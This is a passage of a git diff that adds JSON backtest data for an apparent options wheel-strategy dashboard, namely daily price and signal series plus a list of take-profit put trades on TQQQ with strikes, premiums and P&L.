], + [ + "2026-03-06", + 43.09312936243671 + ], + [ + "2026-03-09", + 48.87174689328981 + ], + [ + "2026-03-10", + 48.87874181244433 + ], + [ + "2026-03-11", + 48.82132860355834 + ], + [ + "2026-03-12", + 41.909314917274 + ], + [ + "2026-03-13", + 39.84725203745566 + ], + [ + "2026-03-16", + 45.30015635790129 + ], + [ + "2026-03-17", + 47.55271755322753 + ], + [ + "2026-03-18", + 42.18317911911477 + ], + [ + "2026-03-19", + 41.066793783394914 + ], + [ + "2026-03-20", + 35.215695455650064 + ], + [ + "2026-03-23", + 40.75717730929798 + ], + [ + "2026-03-24", + 38.614316642184995 + ], + [ + "2026-03-25", + 41.76403617736708 + ], + [ + "2026-03-26", + 34.74864808062604 + ], + [ + "2026-03-27", + 30.360437427125035 + ], + [ + "2026-03-30", + 28.855145837457187 + ], + [ + "2026-03-31", + 42.37827735475595 + ], + [ + "2026-04-01", + 46.50901772694731 + ], + [ + "2026-04-02", + 46.89426684353771 + ], + [ + "2026-04-06", + 48.973590617854576 + ], + [ + "2026-04-07", + 49.028559803895114 + ], + [ + "2026-04-08", + 58.408138056837814 + ], + [ + "2026-04-09", + 60.25350667249632 + ], + [ + "2026-04-10", + 60.6569948294221 + ], + [ + "2026-04-13", + 63.52111179549097 + ], + [ + "2026-04-14", + 67.97449806832054 + ], + [ + "2026-04-15", + 70.97057444648189 + ], + [ + "2026-04-16", + 71.95622679352502 + ], + [ + "2026-04-17", + 74.5013066965117 + ], + [ + "2026-04-20", + 72.75337193531854 + ], + [ + "2026-04-21", + 70.6225321221633 + ], + [ + "2026-04-22", + 74.18999685350938 + ], + [ + "2026-04-23", + 71.01117715977688 + ] + ], + "underlying": [ + [ + "2025-04-24", + 25.888994216918945 + ], + [ + "2025-04-25", + 26.743024826049805 + ], + [ + "2025-04-28", + 26.723163604736328 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18791961669922 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500734329223633 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574142456055 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890213012695 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.907928466796875 + ], + [ + "2025-05-23", + 32.92976379394531 + ], + [ + "2025-05-27", + 35.223731994628906 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.94070816040039 + ], + [ + "2025-05-30", + 34.756988525390625 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.38560485839844 + ], + [ + "2025-06-04", + 36.67856216430664 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.84737777709961 + ], + [ + "2025-06-09", + 37.011234283447266 + ], + [ + "2025-06-10", + 37.72623825073242 + ], + [ + "2025-06-11", + 37.33893585205078 + ], + [ + "2025-06-12", + 37.582244873046875 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685607910156 + ], + [ + "2025-06-17", + 36.524635314941406 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.09067153930664 + ], + [ + "2025-06-24", + 38.77886962890625 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.540504455566406 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276611328125 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.3421516418457 + ], + [ + "2025-07-09", + 42.198577880859375 + ], + [ + "2025-07-10", + 42.00438690185547 + ], + [ + "2025-07-11", + 41.68571853637695 + ], + [ + "2025-07-14", + 42.128868103027344 + ], + [ + "2025-07-15", + 42.238407135009766 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.34379196166992 + ], + [ + "2025-07-18", + 43.19441223144531 + ], + [ + "2025-07-21", + 43.851661682128906 + ], + [ + "2025-07-22", + 43.16951370239258 + ], + [ + "2025-07-23", + 43.73714065551758 + ], + [ + "2025-07-24", + 44.025936126708984 + ], + [ + "2025-07-25", + 44.2748908996582 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.9213752746582 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23506164550781 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.23252487182617 + ], + [ + "2025-08-14", + 47.10307312011719 + ], + [ + "2025-08-15", + 46.43585968017578 + ], + [ + "2025-08-18", + 46.3761100769043 + ], + [ + "2025-08-19", + 44.4840202331543 + ], + [ + "2025-08-20", + 43.67241287231445 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.60850143432617 + ], + [ + "2025-08-26", + 45.12633514404297 + ], + [ + "2025-08-27", + 45.330482482910156 + ], + [ + "2025-08-28", + 46.15702438354492 + ], + [ + "2025-08-29", + 44.493980407714844 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.37112808227539 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.960304260253906 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.14200210571289 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.26162338256836 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.181880950927734 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.48590087890625 + ], + [ + "2025-10-08", + 54.26517105102539 + ], + [ + "2025-10-09", + 54.05086135864258 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.402610778808594 + ], + [ + "2025-10-15", + 51.43429183959961 + ], + [ + "2025-10-16", + 50.86113739013672 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.711952209472656 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.10247039794922 + ], + [ + "2025-10-27", + 58.028045654296875 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.36164093017578 + ], + [ + "2025-11-05", + 56.438167572021484 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.86113739013672 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30083084106445 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596603393555 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.1986083984375 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87641906738281 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.33173370361328 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080001831055 + ], + [ + "2025-12-09", + 55.83012390136719 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037536621094 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.83333969116211 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2025-04-24", + 465.0987243652344 + ], + [ + "2025-04-25", + 470.28363037109375 + ], + [ + "2025-04-28", + 470.13433837890625 + ], + [ + "2025-04-29", + 473.23931884765625 + ], + [ + "2025-04-30", + 473.1795654296875 + ], + [ + "2025-05-01", + 479.3596496582031 + ], + [ + "2025-05-02", + 486.4752502441406 + ], + [ + "2025-05-05", + 483.5892028808594 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378662109375 + ], + [ + "2025-05-09", + 485.6193542480469 + ], + [ + "2025-05-12", + 505.4036560058594 + ], + [ + "2025-05-13", + 513.1063842773438 + ], + [ + "2025-05-14", + 516.181396484375 + ], + [ + "2025-05-15", + 516.748779296875 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7638549804688 + ], + [ + "2025-05-21", + 510.568603515625 + ], + [ + "2025-05-22", + 511.5240173339844 + ], + [ + "2025-05-23", + 506.78692626953125 + ], + [ + "2025-05-27", + 518.7091674804688 + ], + [ + "2025-05-28", + 516.4103393554688 + ], + [ + "2025-05-29", + 517.4254760742188 + ], + [ + "2025-05-30", + 516.6093139648438 + ], + [ + "2025-06-02", + 520.689697265625 + ], + [ + "2025-06-03", + 524.7598876953125 + ], + [ + "2025-06-04", + 526.2228393554688 + ], + [ + "2025-06-05", + 522.2620239257812 + ], + [ + "2025-06-06", + 527.3673095703125 + ], + [ + "2025-06-09", + 528.1435546875 + ], + [ + "2025-06-10", + 531.63671875 + ], + [ + "2025-06-11", + 529.8453369140625 + ], + [ + "2025-06-12", + 531.0892333984375 + ], + [ + "2025-06-13", + 524.421630859375 + ], + [ + "2025-06-16", + 531.7161865234375 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417724609375 + ], + [ + "2025-06-20", + 524.2921752929688 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.7831420898438 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.1992797851562 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622924804688 + ], + [ + "2025-07-07", + 549.9878540039062 + ], + [ + "2025-07-08", + 550.2967529296875 + ], + [ + "2025-07-09", + 554.1921997070312 + ], + [ + "2025-07-10", + 553.3952026367188 + ], + [ + "2025-07-11", + 552.1497192382812 + ], + [ + "2025-07-14", + 554.15234375 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.2283325195312 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7241821289062 + ], + [ + "2025-07-24", + 562.9197998046875 + ], + [ + "2025-07-25", + 564.2747802734375 + ], + [ + "2025-07-28", + 566.0381469726562 + ], + [ + "2025-07-29", + 565.1614379882812 + ], + [ + "2025-07-30", + 565.918701171875 + ], + [ + "2025-07-31", + 562.9197998046875 + ], + [ + "2025-08-01", + 551.8309326171875 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.197265625 + ], + [ + "2025-08-06", + 565.2212524414062 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244384765625 + ], + [ + "2025-08-11", + 570.730712890625 + ], + [ + "2025-08-12", + 577.9041137695312 + ], + [ + "2025-08-13", + 578.1930541992188 + ], + [ + "2025-08-14", + 577.7447509765625 + ], + [ + "2025-08-15", + 575.2041625976562 + ], + [ + "2025-08-18", + 574.9749755859375 + ], + [ + "2025-08-19", + 567.1740112304688 + ], + [ + "2025-08-20", + 563.8065185546875 + ], + [ + "2025-08-21", + 561.1961669921875 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.2100830078125 + ], + [ + "2025-08-26", + 570.4916381835938 + ], + [ + "2025-08-27", + 571.368408203125 + ], + [ + "2025-08-28", + 574.9451293945312 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.5275268554688 + ], + [ + "2025-09-03", + 567.9611206054688 + ], + [ + "2025-09-04", + 573.1019287109375 + ], + [ + "2025-09-05", + 573.9288330078125 + ], + [ + "2025-09-08", + 576.7284545898438 + ], + [ + "2025-09-09", + 578.3624877929688 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.919189453125 + ], + [ + "2025-09-12", + 584.4896240234375 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.9929809570312 + ], + [ + "2025-09-17", + 587.8173217773438 + ], + [ + "2025-09-18", + 593.1176147460938 + ], + [ + "2025-09-19", + 597.1326904296875 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.88427734375 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4783935546875 + ], + [ + "2025-10-15", + 600.6876220703125 + ], + [ + "2025-10-16", + 598.4633178710938 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.98388671875 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4693603515625 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.6743774414062 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.792724609375 + ], + [ + "2025-11-19", + 598.3436889648438 + ], + [ + "2025-11-20", + 584.1798095703125 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3406982421875 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.6743774414062 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4173583984375 + ], + [ + "2025-12-03", + 621.9335327148438 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915893554688 + ], + [ + "2025-12-09", + 623.4595947265625 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0587158203125 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601806640625 + ], + [ + "2025-12-19", + 615.4799194335938 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ] +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/trades.json b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/trades.json new file mode 100644 index 0000000..30514ea --- /dev/null +++ b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/trades.json @@ -0,0 +1,434 @@ +[ + { + "date": "2025-04-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.34, + "spot": 26.743024826049805, + "premium": 0.29771831494625456, + "close_cost": 0.11768716878504693, + "pnl": 12.023114616120761, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-06-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 34.33, + "spot": 37.09067153930664, + "premium": 0.25507430657319397, + "close_cost": 0.0003134096309214199, + "pnl": 19.496089694227255, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-08-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.81, + "spot": 43.547935485839844, + "premium": 0.07631244215648936, + "close_cost": 0.0012067786162033162, + "pnl": 1.530566354028604, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-08-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 42.76, + "spot": 47.16282272338867, + "premium": 0.20387439304942667, + "close_cost": 0.04814236063376276, + "pnl": 9.59320324156639, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-08-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.59, + "spot": 44.60850143432617, + "premium": 0.23350383928957275, + "close_cost": 0.0, + "pnl": 17.370383928957274, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-08-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.93, + "spot": 45.330482482910156, + "premium": 0.33365346119653694, + "close_cost": 0.12654794173393213, + "pnl": 14.73055194626048, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2025-09-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.76, + "spot": 44.36949920654297, + "premium": 0.20378308864153194, + "close_cost": 0.06833610823069369, + "pnl": 7.564698041083824, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-09-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.94, + "spot": 47.58605194091797, + "premium": 0.18230798811836024, + "close_cost": 0.03431214511036429, + "pnl": 8.819584300799594, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2025-09-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.87, + "spot": 50.46242141723633, + "premium": 0.09773871361597575, + "close_cost": 0.03636038484441828, + "pnl": 0.15783287715574623, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.48, + "spot": 51.44924545288086, + "premium": 0.3973731113950638, + "close_cost": 0.02545040672940546, + "pnl": 31.212270466565837, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.72, + "spot": 53.771759033203125, + "premium": 0.5350110743825365, + "close_cost": 0.08535188421012219, + "pnl": 38.98591901724143, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-10-27 00:00:00", + 